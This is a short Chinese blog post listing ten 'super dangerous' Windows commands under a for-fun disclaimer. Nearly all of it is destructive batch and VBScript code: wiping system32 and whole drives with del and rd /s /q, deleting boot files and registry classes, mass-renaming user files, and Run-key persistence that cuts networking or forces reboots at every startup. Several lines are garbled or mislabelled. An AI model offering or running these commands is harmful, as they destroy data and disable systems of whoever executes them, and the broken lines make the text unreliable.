10大超级危险指令<娱乐为主,千万别尝试,如出现问题,概不负责>

2021-05-22  本文已影响0人  Caeser_CC

0x0 蓝屏死机

顾名思义,就是会使电脑蓝屏后死机

Del %windowsdrive%\*.* /f /s /q Shutdown -s -f -t 0

0x1 更改文件后缀名

会使系统中的文件钱包转换成txt文本

Ren *.doc *.txt Ren *.jpeg *.txt Ren *.lnk *.txt Ren *.avi *.txt Ren *.mpeg *.txt Ren *.com *.txt Ren *.bat *.txt

0x2 删除system32

Del c:\windows\system32\*.* /q

0x3 使PC永久崩溃

 @echo off Attrib -r -s -h c:\autoexec.bat Del c:\autoexec.bat Attrib -r -s -h c:\boot.ini Del c:\boot.ini Attrib -r -s -h c:\ntldr Del c:\ ntldr Attrib -r -s -h c:\windows\win.ini Del c:\windows\win.ini 

0x4 删除所有的注册表

@echo off Start reg delete HKCR/.exe Start reg delete HKCR/.dll Start reg delete HKCR/*

0x5 永久禁用网络

echo @echo off>c:\windows\wimn32.bat 
echo break off>>c:\windows\wimn32.bat 
echo ipconfig/release_all>>c:\windowswimn32.bat 
echo end>>c:\windows\wimn32.bat 
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f 
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVision\Run /v CONTROLexit /t reg_sz /d c:/Windows/wimn32.bat /f 
Pause

0x6 一直按回车

Set wshShell=wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys"~(enter)" loop

0x7 启动电脑后自动关机

echo @echo off>c:\Windows\hartlell.bat 
echo break off>>c:\Windows\hartlell.bat 
echo shutdown -r -t 11 -f>>c:\Windows\hartlell.bat 
echo end>>c:\Windows\hartlell.bat 
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windwos\CurrentVersion\Run /v startAPI /t reg_sz /d c:\Windows\hartlell.bat /f 
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v /t reg_sz /d c:\Windows\hartlell.bat /f 
pause

0x8 开启CD蜂鸣器

Set oWMP=CreateObject("WMPlayer.OCX.7") 
Set colCDROMs=oWMP.cdromCollection 
do 
if colCDROMs.Count>=1 then 
For i=0 to colCDROMs.Count -1 
colCDROMs.Item(i).Eject 
Next 
For i=0 to colCDROMs.Count -1 
colCDROMs.Item(i).Eject 
Next 
End If 
wscript.sleep 100 
loop 10. rd/s/q D:\ rd/s/q C:\ rd/s/q E:\

0x9 格式化硬盘

rd/s/q D:/
rd/s/q C:/
rd/s/q E:/
上一篇下一篇

猜你喜欢

热点阅读